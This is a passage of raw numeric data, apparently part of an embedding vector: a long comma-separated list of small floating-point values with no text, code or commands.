-0.018544819205999374, -0.044685278087854385, -0.0204938892275095, -0.0054781739600002766, -0.0121315224096179, 0.014890315011143684, 0.017799587920308113, 0.012353658676147461, 0.026556067168712616, -0.018043221905827522, -0.016624413430690765, -0.001442096196115017, 0.007846436463296413, -0.009250912815332413, 0.014438875950872898, -0.010232613421976566, -0.0020905917044728994, -0.010956347920000553, -0.016036827117204666, 0.015248599462211132, 0.004277920350432396, 0.006506451405584812, -0.022070342674851418, -0.015735866501927376, 0.016137145459651947, 0.015606884844601154, -0.0011500940890982747, -0.008319372311234474, -0.003851561341434717, 0.015979500487446785, 0.01284809224307537, -0.019877638667821884, 0.0015952629037201405, 0.0071334498934447765, -0.01533458847552538, 0.018788453191518784, 0.04563114792108536, 0.022543277591466904, 0.007523979991674423, 0.021798046305775642, -0.0008975033415481448, 0.019089411944150925, -0.013048731721937656, -0.02139676734805107, 0.011121159419417381, -0.006280731875449419, -0.026857025921344757, -0.012210344895720482, -0.008398194797337055, -0.018200866878032684, 0.005105557851493359, -0.005062563810497522, 0.008677656762301922, -0.01620880328118801, 0.028763100504875183, -0.0023736367002129555, -0.002753418404608965, 0.0017134968657046556, 0.011271638795733452, 0.014259734191000462, 0.0071477810852229595, -0.00033118948340415955, -0.002642350271344185, -0.0008567484328523278, -0.007283929269760847, 0.020665865391492844, 0.0023754280991852283, 0.021282115951180458, 0.023890428245067596, 0.006560194306075573, -0.017169006168842316, 0.004091612063348293, 0.0031851516105234623, -0.012410984374582767, 0.002694301540032029, -0.01242531556636095, -0.006997301708906889, -0.0475228913128376, 0.017813919112086296, -0.02184103988111019, 0.0006789496401324868, 0.010096465237438679, 0.003126034513115883, -0.02029324881732464, -0.026613391935825348, -0.02949400246143341, -0.008075738325715065, 0.008147395215928555, -0.0031851516105234623, 0.010024807415902615, -0.017369644716382027, -0.01990630105137825, 0.03333481401205063, 0.014173745177686214, -0.02174071967601776, 0.005775550380349159, 0.006055012810975313, 0.014632349833846092, 0.017054354771971703, -0.04044318571686745, -0.0265703983604908, 0.004482142627239227, -0.01916106976568699, -0.006527948658913374, -0.017871243879199028, 0.013263702392578125, -0.009086101315915585, 0.0165527556091547, -0.01966266892850399, -0.004482142627239227, -0.02188403345644474, 0.002063720254227519, -0.01501929759979248, 0.017211999744176865, 0.02608313038945198, -0.005807796027511358, -0.004027120769023895, 0.01788557507097721, 0.019032087177038193, -0.022930225357413292, 0.007896596565842628, -0.018544819205999374, -0.022414295002818108, -0.020278917625546455, 0.02321685291826725, -0.004955078475177288, -0.017570285126566887, 0.007240935228765011, 0.005195129197090864, -0.018401505425572395, -0.009731014259159565, 0.017269326373934746, -0.004926415625959635, 0.0341946966946125, -0.02410539984703064, -0.0005916177178733051, 0.0013874578289687634, -0.014804326929152012, -0.00695072440430522, -0.007817774079740047, -0.027688246220350266, 0.00015103942132554948, 0.0024721648078411818, -0.004195514600723982, 0.027544932439923286, 0.0007936007459647954, -0.0023288510274142027, 0.019977958872914314, -0.019404703751206398, -0.01101367361843586, 0.02505127154290676, -0.00812589842826128, 0.0006314769270829856, 0.014775663614273071, -0.03367877006530762, 0.004689947701990604, -0.01714034378528595, 0.021497085690498352, 0.0010426086373627186, 0.012088527902960777, 0.016194472089409828, -0.01566421054303646, -0.0022733169607818127, 0.01148660946637392, -0.005438762716948986, -0.03729027882218361, -0.005162883549928665, -0.0025241163093596697, 0.0008791412692517042, 0.007319757714867592, 0.03817882388830185, 0.020436562597751617, 0.017942901700735092, -0.008949953131377697, -0.004482142627239227, 0.006732170935720205, 0.03250359371304512, -0.013872786425054073, -0.014832989312708378, 0.028146851807832718, -0.011307467706501484, -0.011443615891039371, -0.012260504998266697, 0.0220846738666296, -0.014166579581797123, 0.02923603728413582, 0.005664482247084379, -0.015578221529722214, -0.0039053040090948343, -0.012898251414299011, -0.003122451715171337, -0.017226330935955048, -0.007896596565842628, -0.030067257583141327, 0.017169006168842316, 0.006345223169773817, 0.012153019197285175, 0.004621873609721661, 0.0020475974306464195, -0.023919090628623962, -0.005983355455100536, 0.030239233747124672, -0.027086328715085983, 0.0034037053119391203, 0.0009216875769197941, 0.0009655774338170886, -0.004732941742986441, 0.037175629287958145, 0.011938048526644707, 0.025036940351128578, -0.019891969859600067, -0.004965826869010925, -0.003701081732288003, -0.017111681401729584, 0.01108533050864935, 0.00010390258103143424, 0.006316560320556164, 0.017842581495642662, 0.020737523213028908, 0.014603687450289726, 0.024320369586348534, -0.039984580129384995, -0.012998571619391441, -0.025008276104927063, 0.028978072106838226, 0.008326537907123566, 0.025624526664614677, 0.005453094374388456, -0.0021586657967418432, -0.03425202518701553, -0.01832984946668148, -0.012575795873999596, 0.0020601374562829733, -0.0023306424263864756, -0.004908501170575619, -0.010017641820013523, 0.0053348601795732975, -0.0001868678955361247, -0.006123086903244257, 0.029207374900579453, -0.0033392140176147223, 0.009007278829813004, -0.0010318601271137595, -0.019189732149243355, -0.0226722601801157, 0.016223134472966194, 0.008749313652515411, 0.003199483035132289, -0.016911040991544724, -0.01398027129471302, -0.014704006724059582, -0.012762103229761124, -0.0032998027745634317, 0.001219063880853355, -0.007205106783658266, -0.018831446766853333, -0.0033786254934966564, -0.010189618915319443, 0.022758249193429947, -0.007968253456056118, -0.009566203691065311, -0.009881493635475636, -0.0017108097672462463, 0.016237465664744377, 0.012883920222520828, 0.004689947701990604, 0.015635548159480095, -0.02065153419971466, -0.005438762716948986, 0.005865121725946665, 0.004969409666955471, 0.006886233109980822, -0.013521667569875717, 0.014245402067899704, 0.012016871012747288, -0.0082978755235672, 0.021124469116330147, -0.023059207946062088, 0.002350348047912121, -0.004933581221848726, 0.0226722601801157, -0.023575138300657272, -0.02014993503689766, -0.015592552721500397, 0.026312433183193207, -0.014066260308027267, 0.011601260863244534, -0.03625841811299324, -0.020909499377012253, -0.011457947082817554, -0.0010990385198965669, -0.008068572729825974, -0.011694414541125298, -0.0002993917150888592, 0.015492233447730541, -0.005664482247084379, 0.02549554407596588, 0.013707974925637245, -0.01960534229874611, 0.005890201777219772, 0.0037691558245569468, 0.0004427056119311601, 0.027774235233664513, -0.0030507948249578476, -0.004267171490937471, 0.010956347920000553, -0.0022733169607818127, -0.010633892379701138, 0.011579764075577259, 0.022944556549191475, 0.004668450448662043, 0.002880609594285488, 0.005148552358150482, 0.006947141606360674, -0.00550683680921793, -0.017813919112086296, 0.0032603912986814976, -0.0013856663135811687, 0.0004684573505073786, 0.020221592858433723, -0.0034789450000971556, -0.008305041119456291, 0.0032030658330768347, 0.0062592350877821445, -0.003969795070588589, -0.019089411944150925, 0.015004966408014297, 0.013321028091013432, 0.0057253907434642315, -0.011572598479688168, -0.0032818885520100594, 0.02523757889866829, -0.005682396236807108, -0.005754053592681885, 0.012998571619391441, -0.0013937277253717184, 0.0021586657967418432, 0.001566600170917809, -0.0009924487676471472, 0.007738951127976179, -0.021755050867795944, -0.0019634005147963762, 0.009945984929800034, -0.021597405895590782, -0.0053993514738976955, -0.013399850577116013, -0.003188734408468008, 0.005037483759224415, 0.007459488697350025, -0.010318601503968239, 0.009035942144691944, -0.005854373332113028, 0.029164379462599754, -0.0037942356429994106, 0.0037512416020035744, 0.00582929328083992, 0.004840427078306675, -0.012776435352861881, 0.0270719975233078, 0.010669720359146595, 0.0035649335477501154, 0.004027120769023895, -0.020680196583271027, 0.004220594651997089, 0.008749313652515411, -0.0020368488039821386, 0.028863420709967613, 0.021525748074054718, 0.016122814267873764, -0.0026172702200710773, 0.0028644867707043886, -0.007946755737066269, -0.006574525497853756, -0.014180910773575306, -0.010067801922559738, 0.004711444955319166, -0.007609968539327383, -0.004793850239366293, 0.0026674300897866488, -0.0039017212111502886, -0.02515159174799919, 0.023775776848196983, 0.011923717334866524, 0.001812920905649662, -0.005983355455100536, 0.0018415837548673153, 0.021798046305775642, 0.0036867503076791763, 0.039096035063266754, 0.0005266786320134997, 0.0036168848164379597, -0.015721535310149193, -0.0070689585991203785, -0.011522438377141953, 0.01284809224307537, 0.007226604036986828, 0.00570389349013567, -0.007724619470536709, -0.008168892934918404, -0.009272409602999687, -0.01843016780912876, 0.001223542494699359, 0.019376039505004883, 0.005245288833975792, 0.020436562597751617, -0.00978117436170578, 0.01867380179464817, 0.025524206459522247, -0.004152520559728146, 0.005177214741706848, -0.010368761606514454, -0.042105626314878464, -0.01116415299475193, 0.00605142954736948, -0.017770923674106598, 0.004066532012075186, -0.005696727894246578, 0.002303770976141095, 0.0107915373519063, 0.005736139137297869, 0.0032388942781835794, 0.010139458812773228, -0.003195900237187743, -0.012941245920956135, -0.010626725852489471, 0.01871679723262787, 0.014481870457530022, -0.01003197394311428, 0.0010856027947738767, 0.004836844280362129, 0.012647452764213085, 0.02194136008620262, -0.0006713360780850053, -0.004224177449941635, 0.0006498389993794262, -0.014582189731299877, -0.01017528772354126, 0.009265244007110596, -0.009881493635475636, 0.0029630151111632586, -0.00028102961368858814, 0.02237130142748356, 0.019648335874080658, -0.007609968539327383, -0.007380666211247444, -0.0015576430596411228, 0.004646953660994768, -0.014066260308027267, -0.015406245365738869, -0.002314519602805376, -0.006836073473095894, 0.02331717312335968, -0.012396653182804585, 0.012117191217839718, -0.01941903494298458, 0.0005114515079185367, 0.004872672725468874, -0.011099662631750107, -0.023933421820402145, 0.014130751602351665, -0.0067894961684942245, 0.006198326591402292, 0.006861153524369001, -0.005764801986515522, 0.0010515657486394048, -0.0036867503076791763, 0.018387174233794212, 0.016782058402895927, -0.02000662125647068, -0.0007488151895813644, -0.007298260927200317, 0.008828137069940567, -0.005721807945519686, -0.05073312297463417, -0.008971450850367546, -0.0001990719756577164, 0.02826150320470333, 0.013077394105494022, -0.0019060749327763915, -0.014123586006462574, -0.0018953264225274324, 0.0029307694640010595, -0.01792857050895691, -0.007197941187769175, -0.009014444425702095, 0.014704006724059582, 0.006094424054026604, 0.0332774892449379, 0.016280459240078926, -0.014539196155965328, -0.020952492952346802, 0.0181865356862545, 0.028333159163594246, 0.0008003186085261405, 0.004715027753263712, 0.0037691558245569468, -0.0038014014717191458, 0.031299758702516556, 0.0008983990410342813, -0.0030722918454557657, 0.010956347920000553, 0.0009069083025678992, 0.01046908088028431, 0.010504909791052341, 0.004249257501214743, -0.03299086168408394, 0.0033875824883580208, 0.01447470486164093, 0.0165957510471344, 0.01580752432346344, 0.011536769568920135, -0.03817882388830185, -0.026742374524474144, -0.008183224126696587, 0.005091226659715176, -0.005764801986515522, 0.004388988483697176, 0.016882378607988358, -0.00916492473334074, 0.004926415625959635, -0.02406240440905094, -0.013779631815850735, 0.008563006296753883, -0.04795283451676369, -0.018788453191518784, 0.008391029201447964, 0.0020744688808918, 0.01097068004310131, -0.0014026848366484046, 0.015506564639508724, -0.028032200410962105, -0.01266894955188036, 0.014331391081213951, 0.007523979991674423, -0.00985283125191927, -0.0036204676143825054, 0.03686033561825752, 0.014775663614273071, 0.00815456174314022, -0.005488922819495201, -0.0331055112183094, -0.002826866926625371, -0.0039268010295927525, -0.015893511474132538, -0.018014557659626007, 0.017412640154361725, 0.02444935217499733, 0.01198104303330183, 0.003855144139379263, 0.022299643605947495, -0.000023386479369946755, 0.0021783714182674885, -0.027186648920178413, -0.01851615682244301, -0.0121315224096179, -0.0066963424906134605, 0.003948298282921314, 0.026298101991415024, 0.0035649335477501154, 0.007416494656354189, 0.013879952020943165, 0.010777206160128117, -0.015506564639508724, -0.017770923674106598, 0.015621216036379337, 0.0018630807753652334, 0.013027234002947807, 0.004335245583206415, 0.0029200208373367786, -0.0018308351282030344, -0.00438540568575263, 0.0011527813039720058, -0.006481371354311705, -0.000649391149636358, 0.0187741219997406, -0.006370303221046925, -0.0121315224096179, 0.012647452764213085, 0.014317058958113194, -0.008176058530807495, 0.01728365756571293, 0.009007278829813004, -0.013263702392578125, 0.010340098291635513, -0.01744130253791809, -0.02336016669869423, -0.024521009996533394, 0.016538424417376518, 0.024535341188311577, 0.03379341959953308, 0.001997437560930848, -0.017054354771971703, 0.0028017868753522635, -0.013571826741099358, -0.002991677727550268, -0.013528833165764809, 0.01165858656167984, -0.013564661145210266, -0.01960534229874611, -0.004725776147097349, 0.004879838787019253, 0.013227873481810093, 0.017068685963749886, -0.005471008364111185, 0.008928456343710423, -0.011844894848763943, -0.00945871789008379, 0.011028004810214043, 0.019934965297579765, 0.01994929648935795, -0.011687248945236206, 0.01625179685652256, -0.010189618915319443, 0.010512075386941433, 0.00507331220433116, 0.008462686091661453, 0.000009684885299066082, -0.0002000796521315351, 0.009566203691065311, -0.03204498812556267, -0.013120388612151146, 0.005556996911764145, 0.007867933250963688, 0.009487380273640156, 0.01744130253791809, -0.008326537907123566, 0.008233384229242802, -0.012862423434853554, -0.012611623853445053, 0.010089298710227013, -0.00010905292583629489, -0.01150810718536377, -0.0182725228369236, 0.02780289761722088, 0.009394226595759392, 0.009329735301434994, -0.017412640154361725, -0.006563777104020119, 0.004715027753263712, 0.0034341595601290464, 0.012067031115293503, -0.003887389786541462, -0.0013982063392177224, 0.014109253883361816, 0.02119612693786621, 0.011257307603955269, -0.010669720359146595, 0.00590095017105341, -0.004793850239366293, -0.018157871440052986, -0.010440418496727943, 0.01526293158531189, -0.0030722918454557657, -0.02791754901409149, 0.006821741815656424, -0.0040092067793011665, -0.014016100205481052, 0.03508324548602104, -0.0029415178578346968, -0.0007044774247333407, 0.00766729423776269, -0.01841583661735058, 0.007810608018189669, -0.00010927685798378661, -0.013184879906475544, -0.014338556677103043, 0.017742261290550232, 0.0006888024508953094, -0.027086328715085983, -0.0004796537396032363, 0.012260504998266697, -0.0032156058587133884, -0.017412640154361725, -0.02366112545132637, -0.025524206459522247, -0.00045658915769308805, 0.0014161205617710948, 0.010039139539003372, -0.0040378691628575325, 0.011006508022546768, 0.006205492187291384, -0.008878296241164207, -0.007058209739625454, 0.01101367361843586, 0.0008468956220895052, 0.015277262777090073, -0.004736524540930986, 0.02327417954802513, 0.0062090749852359295, -0.01444604154676199, 0.0014832989545539021, -0.01259729266166687, 0.010977845638990402, 0.017570285126566887, -0.019648335874080658, -0.010404589585959911, -0.003765573026612401, 0.014675344340503216, -0.021654730662703514, -0.0004324049223214388, -0.00822621863335371, -0.010304270312190056, 0.004138188902288675, -0.009129095822572708, 0.036086443811655045, 0.018258191645145416, -0.03579981252551079, 0.013306695967912674, 0.0076171341352164745, 0.014668178744614124, 0.022056009620428085, 0.02346048690378666, -0.022242318838834763, -0.00031797774136066437, 0.008097236044704914, 0.010927685536444187, -0.017154674977064133, -0.004242091905325651, 0.01946202851831913, -0.0018756208010017872, 0.003156488761305809, 0.0006010226788930595, 0.0061947437934577465, -0.0065996055491268635, -0.004184766206890345, 0.024320369586348534, -0.0067894961684942245, -0.004410485737025738, 0.005105557851493359, -0.015391914173960686, 0.03107045590877533, 0.012647452764213085, -0.023001881316304207, 0.014775663614273071, -0.011529603973031044, -0.0009216875769197941, -0.01491897739470005, 0.00844835489988327, 0.0012486224295571446, -0.0015155446017161012, -0.0003853800590150058, 0.00035604549339041114, 0.0034359509591013193, -0.00445706257596612, 0.009193587116897106, -0.011816231533885002, 0.008563006296753883, 0.014460373669862747, -0.018702464178204536, 0.006112338043749332, -0.011400621384382248, 0.0016830427339300513, -0.005012403707951307, 0.007244518026709557, 0.0137867983430624, -0.013528833165764809, 0.010927685536444187, -0.0036437560338526964, 0.03052586317062378, 0.005392185878008604, -0.0091362614184618, -0.017570285126566887, -0.0028429897502064705, 0.02188403345644474, -0.008756480179727077, -0.0008576441905461252, 0.006019184365868568, 0.003865892766043544, -0.01501929759979248, -0.010698383674025536, -0.012575795873999596, 0.0036760016810148954, 0.00501598697155714, -0.00718719232827425, 0.03370743244886398, -0.009351232089102268, -0.004768770188093185, -0.0037046645302325487, 0.019146738573908806, 0.014818658120930195, -0.0053205289877951145, -0.009143427014350891, -0.01610848307609558, -0.005123472306877375, 0.005711059086024761, -0.014668178744614124, 0.006244903430342674, 0.014689675532281399, -0.011766071431338787, -0.00487625552341342, 0.012719109654426575, 0.0003486558562144637, -0.023503480479121208, 0.011773237958550453, -0.0054781739600002766, 0.03284754604101181, 0.0015952629037201405, 0.012683280743658543, -0.03502592071890831, 0.002726547187194228, -0.002762375632300973, -0.013378352858126163, -0.0004720401775557548, 0.01585051789879799, -0.0005199607694521546, -0.012504138052463531, -0.023947754874825478, -0.011450781486928463, 0.0008253985433839262, -0.018444500863552094, 0.00877081137150526, 0.001879203598946333, -0.00021877764083910733, 0.015879180282354355, 0.005026735365390778, -0.000009635900823923294, 0.019977958872914314, -0.014668178744614124, 0.01843016780912876, -0.009501712396740913, -0.0006874589016661048, -0.01444604154676199, -0.002819701097905636, 0.005571328103542328, -0.0018756208010017872, 0.019533686339855194, -0.007072541397064924, 0.0010076758917421103, 0.017498627305030823, -0.0020780516788363457, 0.00750964879989624, -0.014761332422494888, 0.001806651009246707, 0.018014557659626007, 0.012289167381823063, 0.008634663186967373, 0.014718337915837765, -0.00805424153804779, -0.019032087177038193, 0.006427628919482231, -0.010583732277154922, -0.003328465623781085, 0.010834531858563423, -0.0008567484328523278, -0.00009125065116677433, -0.017498627305030823, -0.009430055506527424, -0.0059403614141047, -0.015449238941073418, 0.014073425903916359, 0.0011581555008888245, 0.014718337915837765, -0.005273951683193445, 0.012353658676147461, 0.017871243879199028, 0.02327417954802513, 0.010605229064822197, -0.03691766411066055, -0.021282115951180458, -0.002205242868512869, 0.0024542505852878094, 0.02085217274725437, -0.014073425903916359, 0.0071334498934447765, 0.014732670038938522, 0.025667520239949226, 0.0011760697234421968, 0.02079484798014164, -0.018143540248274803, 0.013571826741099358, 0.01533458847552538, 0.02109580673277378, 0.022944556549191475, -0.01049774419516325, 0.012948411516845226, -0.02297321893274784, 0.00675366772338748, -0.006900564767420292, -0.009465883485972881, 0.00852001179009676, -0.017426971346139908, -0.0051915463991463184, -0.012282001785933971, -0.0037763214204460382, -0.02904972992837429, -0.004679199308156967, -0.002389759523794055, -0.006904147565364838, -0.00044673631782643497, 0.017713598906993866, -0.02622644603252411, -0.012332161888480186, -0.04222027584910393, -0.005241706036031246, 0.008885461837053299, -0.002224948490038514, -0.003131408942863345, -0.013621986843645573, 0.026054468005895615, -0.007982584647834301, 0.0065816910937428474, 0.0034341595601290464, 0.015592552721500397, 0.02083784155547619, 0.000004426076429808745, -0.016180140897631645, -0.006603188347071409, -0.015778861939907074, -0.005599990952759981, -0.011773237958550453, -0.047494228929281235, -0.014094922691583633, -0.017813919112086296, 0.009659357368946075, 0.010576566681265831, 0.00812589842826128, -0.015277262777090073, 0.002183745615184307, -0.015363250859081745, 0.004783101845532656, 0.015549559146165848, 0.009659357368946075, -0.011228644289076328, 0.011149821802973747, -0.0023646794725209475, 0.007409329060465097, 0.000059228950703982264, -0.0005369792925193906, 0.009086101315915585, -0.003627633210271597, 0.017326651141047478, -0.005642984993755817, 0.003765573026612401, 0.0007689686608500779, -0.013356856070458889, -0.008634663186967373, -0.008928456343710423, -0.00881380494683981, 0.019304383546113968, 0.0054136826656758785, 0.019748656079173088, -0.022099005058407784, -0.013664981350302696, 0.009867162443697453, -0.0116299232468009, -0.0137867983430624, 0.010096465237438679, -0.022342639043927193, -0.017469964921474457, 0.005026735365390778, -0.020923830568790436, 0.021726388484239578, -0.010848863050341606, -0.007380666211247444, 0.007097621448338032, -0.014947640709578991, -0.007925258949398994, 0.007319757714867592, 0.010168122127652168, -0.014933309517800808, 0.011350461281836033, 0.01673906482756138, 0.010347263887524605, -0.005277534481137991, 0.0018380008405074477, -0.004098777659237385, -0.00920791830867529, 0.021912695840001106, -0.000580869207624346, -0.026068799197673798, 0.009759677574038506, 0.007717453874647617, -0.0019078664481639862, -0.04832544922828674, 0.018200866878032684, -0.007531146053224802, 0.028032200410962105, -0.017455633729696274, -0.01683938503265381, -0.011615592055022717, -0.03442399948835373, 0.0024972448591142893, 0.016825051978230476, 0.014632349833846092, -0.010354429483413696, -0.000013533647688745987, -0.012776435352861881, 0.008663325570523739, -0.01249697245657444, 0.034366674721241, -0.0035559763200581074, 0.0007389623206108809, -0.010189618915319443, -0.004553799517452717, 0.02583949826657772, 0.004736524540930986, 0.008219053037464619, -0.0018057551933452487, -0.0007855393341742456, -0.003984126728028059, -0.008312206715345383, -0.02257193997502327, -0.012253339402377605, -0.012339327484369278, -0.0034269937314093113, 0.008262046612799168, 0.009731014259159565, -0.003661670256406069, 0.017756592482328415, 0.0070367129519581795, 0.012790766544640064, -0.012855257838964462, 0.006563777104020119, 0.01109249610453844, 0.00963069498538971, -0.0011214313562959433, 0.005184380803257227, 0.014388716779649258, -0.015477902255952358, 0.004869089927524328, 0.020565545186400414, -0.008025579154491425, -0.00015271888696588576, 0.005721807945519686, -0.0012118982849642634, -0.011572598479688168, -0.003693915903568268, 0.013077394105494022, 0.02262926660478115, 0.01719766855239868, 0.007566974498331547, 0.0012674323515966535, -0.00931540410965681, -0.0021479171700775623, -0.008892628364264965, 0.001502108876593411, -0.010827365331351757, -0.0075526428408920765, 0.020364906638860703, -0.0024578336160629988, -0.007154946681112051, -0.00322277145460248, -0.016094151884317398, -0.00048010158934630454, 0.028533799573779106, 0.03966929018497467, -0.014123586006462574, 0.012439646758139133, 0.011049502529203892, -0.001523606013506651, 0.01064822357147932, -0.024922288954257965, 0.003296219976618886, 0.004091612063348293, 0.0048332614824175835, -0.0004088924906682223, -0.01887444220483303, 0.0022661511320620775, -0.0013856663135811687, 0.014331391081213951, -0.00783210527151823, -0.010311435908079147, 0.0005007029394619167, -0.001163529814220965, 0.00720152398571372, 0.030153246596455574, 0.007860767655074596, 0.0015101702883839607, 0.009895825758576393, -0.021597405895590782, -0.001746638212352991, 0.022743918001651764, 0.01851615682244301, 0.009114764630794525, -0.025796502828598022, 0.002567110350355506, 0.027602259069681168, -0.0014707589289173484, 0.006112338043749332, -0.019032087177038193, -0.013206376694142818, 0.0024739564396440983, 0.00094945466844365, -0.010426086373627186, 0.007609968539327383, 0.016137145459651947, 0.009523209184408188, -0.007531146053224802, 0.01087035983800888, -0.02089516818523407, 0.019189732149243355, -0.022557608783245087, -0.009924488142132759, -0.004987324122339487, 0.011529603973031044, 0.030411211773753166, -0.020465226843953133, 0.013593324460089207, 0.0008724234066903591, -0.009465883485972881, 0.021726388484239578, -0.013184879906475544, 0.005005238112062216, -0.011701580137014389, 0.019834645092487335, 0.013600490055978298, 0.005338442977517843, -0.008204720914363861, 0.0025169504806399345, -0.022156329825520515, 0.018157871440052986, 0.00931540410965681, -0.0053993514738976955, -0.0033607110381126404, -0.015176942571997643, 0.005897367373108864, -0.022829905152320862, 0.015406245365738869, -0.014596521854400635, 0.007000884506851435, 0.007796276360750198, 0.0017314112046733499, -0.005453094374388456, 0.015348919667303562, -0.011078164912760258, -0.008605999872088432, 0.010934851132333279, -0.001249518129043281, 0.00024049865896813571, -0.012955577112734318, 0.005187963601201773, 0.005503254011273384, -0.007889430969953537, -0.008613165467977524, 0.0025850245729088783, 0.023876097053289413, -0.019934965297579765, -0.00019896001322194934, 0.02069452777504921, -0.012726275250315666, 0.025180254131555557, -0.0010551486629992723, 0.0005656420835293829, 0.003298011375591159, -0.012296332977712154, 0.013321028091013432, 0.002192702842876315, -0.016810720786452293, -0.004116692114621401, -0.015965169295668602, 0.010777206160128117, -0.0003305177087895572, 0.002006394788622856, 0.0066784280352294445, 0.009888659231364727, -0.012876754626631737, 0.014016100205481052, 0.017570285126566887, -0.003059751819819212, 0.0034359509591013193, -0.0019562349189072847, -0.010426086373627186, 0.00271758995950222, 0.04156103357672691, 0.01847316324710846, -0.001545103034004569, -0.008305041119456291, -0.01108533050864935, -0.00023848330602049828, -0.013578992336988449, 0.000977221759967506, 0.0061624981462955475, -0.009057438932359219, -0.011687248945236206, -0.002633393043652177, -0.034853942692279816, 0.011099662631750107, 0.019247056916356087, -0.008656159974634647, -0.005299031734466553, -0.016982698813080788, -0.012762103229761124, 0.01367931254208088, 0.011565431952476501, 0.008663325570523739, 0.005764801986515522, 0.007119118236005306, -0.0008437606156803668, 0.012239007279276848, -0.03155772387981415, -0.00532411178573966, 0.012647452764213085, -0.056437015533447266, 0.006979387253522873, -0.00921508390456438, -0.021669063717126846, 0.024435020983219147, 0.007352003362029791, 0.0013641692930832505, 0.006080092396587133, 0.00539576867595315, -0.004578879568725824, -0.019920634105801582, -0.002850155346095562, -0.0028788181953132153, 0.00500165531411767, 0.014890315011143684, 0.0032120230607688427, -0.0036079275887459517, -0.002128211548551917, 0.005947527009993792, 0.0029648065101355314, -0.0004093403404112905, -0.0018612893763929605, -0.00007137704233173281, -0.006972221657633781, 0.02790321782231331, -0.004113109316676855, -0.01956234872341156, 0.016022494062781334, 0.01693970337510109, 0.00859166868031025, -0.014231070876121521, 0.0018523322651162744, 0.009272409602999687, 0.012410984374582767, 0.02252894639968872, 0.013227873481810093, 0.010454749688506126, 0.014603687450289726, 0.002009977586567402, 0.001922197756357491, -0.0066425995901227, 0.029866619035601616, -0.014367219060659409, -0.01926138997077942, -0.01822952926158905, -0.014453208073973656, 0.0010237987153232098, -0.013306695967912674, 0.00758130569010973, -0.0030203405767679214, -0.026054468005895615, -0.014123586006462574, 0.03132842108607292, 0.02430603839457035, -0.007523979991674423, -0.007366335019469261, 0.0107915373519063, 0.006699925288558006, 0.014904646202921867, 0.0015245017129927874, -0.0026441416703164577, 0.006151749286800623, 0.0008182328310795128, 0.0009082519100047648, 0.008455520495772362, -0.008534342981874943, 0.020436562597751617, -0.0016696070088073611, -0.00030028741457499564, -0.024277376011013985, 0.010533572174608707, 0.0008065885631367564, -0.016165809705853462, 0.012912583537399769, -0.00001858602263382636, 0.011601260863244534, -0.03952597454190254, 0.016122814267873764, -0.004725776147097349, -0.013636318035423756, 0.0003376833919901401, -0.0032478515058755875, -0.00550683680921793, -0.011500940658152103, 0.030267897993326187, 0.013707974925637245, 0.0022554027382284403, 0.01871679723262787, 0.006578108295798302, 0.02553853765130043, -0.0062413206323981285, -0.02252894639968872, -0.001705435453914106, -0.011343295685946941, 0.009716683067381382, 0.0013238622341305017, -0.014259734191000462, -0.015219937078654766, -0.018344180658459663, 0.01887444220483303, -0.012711944058537483, -0.007373500615358353, 0.009444386698305607, 0.015692872926592827, -0.001442096196115017, -0.006402548868209124, -0.014832989312708378, -0.028419148176908493, -0.012110025621950626, 0.00837669800966978, 0.000022840653400635347, 0.00727318087592721, -0.011121159419417381, -0.009501712396740913, 0.011178485117852688, 0.010583732277154922, -0.0033159255981445312, 0.0013229665346443653, -0.01625179685652256, -0.01336402166634798, 0.020966824144124985, 0.010125127620995045, 0.006725005339831114, 0.039439987391233444, 0.007774779573082924, 0.007248100824654102, -0.0032066486310213804, 0.013736638240516186, -0.007402163464576006, -0.010741377249360085, 0.0006261026137508452, 0.01556389033794403, 0.02010694146156311, -0.0116299232468009, -0.02899240329861641, 0.0027605842333287, 0.0027695412281900644, 0.015148280188441277, 0.0008921290864236653, 0.01921839453279972, 0.015219937078654766, 0.01693970337510109, 0.0031385745387524366, -0.031987663358449936, -0.0018541236640885472, 0.018157871440052986, 0.003591804765164852, 0.009100433439016342, -0.01762760989367962, -0.008061407133936882, -0.011873557232320309, -0.0008706320077180862, 0.01150810718536377, 0.009279575198888779, -0.020981155335903168, -0.012876754626631737, -0.02168339490890503, -0.026642056182026863, -0.013994603417813778, 0.0007425451767630875, 0.0023306424263864756, 0.023503480479121208, -0.002907480811700225, -0.013242204673588276, 0.010805868543684483, 0.01118565071374178, 0.020737523213028908, 0.004589627962559462, -0.0032675571274012327, 0.011694414541125298, 0.007366335019469261, -0.011773237958550453, -0.00758130569010973, -0.0002846124698407948, 0.006366720423102379, 0.0016015329165384173, 0.015348919667303562, 0.00017119293625000864, -0.0027426700107753277, -0.0021586657967418432, -0.013944443315267563, -0.013643483631312847, 0.02133944071829319, 0.00426000589504838, -0.01693970337510109, 0.0014429918956011534, 0.020780516788363457, -0.015678541734814644, 0.010526406578719616, 0.030067257583141327, -0.0032030658330768347, -0.001757386839017272, -0.012640286237001419, 0.026212112978100777, -0.0019723577424883842, -0.016782058402895927, 0.00006443527672672644, -0.0030490034259855747, -0.010182453319430351, -0.013156216591596603, 0.007932424545288086, -0.011723077856004238, 0.009623528458178043, 0.002108505927026272, -0.011837729252874851, 0.00676799938082695, 0.0044928910210728645, 0.00532411178573966, -0.0034628224093466997, 0.023102201521396637, -0.004263588692992926, 0.0009190004202537239, -0.004471393767744303, -0.017169006168842316, 0.009645026177167892, 0.0054315971210598946, 0.00418834900483489, 0.0034234109334647655, 0.01841583661735058, 0.007982584647834301, 0.02212766744196415, -0.020766185596585274, 0.006327309180051088, 0.014410213567316532, -0.003855144139379263, 0.0026996757369488478, -0.008684822358191013, 0.01758461631834507, -0.01635211706161499, -0.002052971627563238, 0.01509095449000597, 0.014610853046178818, 0.013098890893161297, 0.022156329825520515, 0.00790376216173172, 0.012704777531325817, 0.009078935720026493, 0.0171833373606205, 0.02400507964193821, 0.010727046057581902, -0.027157984673976898, -0.0022070342674851418, 0.007226604036986828, 0.0032783057540655136, -0.013442844152450562, -0.010669720359146595, 0.019146738573908806, 0.014625184237957, -0.01610848307609558, 0.006929227616637945, -0.003504025051370263, 0.012382321991026402, 0.007452323101460934, -0.01109249610453844, -0.004435565322637558, 0.003568516345694661, 0.023790108039975166, -0.012196013703942299, -0.0037440757732838392, -0.010261275805532932, 0.021697726100683212, 0.016137145459651947, -0.028720106929540634, -0.004302999936044216, 0.0011536770034581423, 0.018286854028701782, 0.005252454895526171, -0.0027713326271623373, 0.02834749035537243, -0.0072122723795473576, 0.02568185143172741, -0.0036974989343434572, -0.0018156081205233932, -0.0031152861192822456, -0.0018594979774206877, -0.011121159419417381, 0.007008050102740526, 0.011142656207084656, 0.009222250431776047, 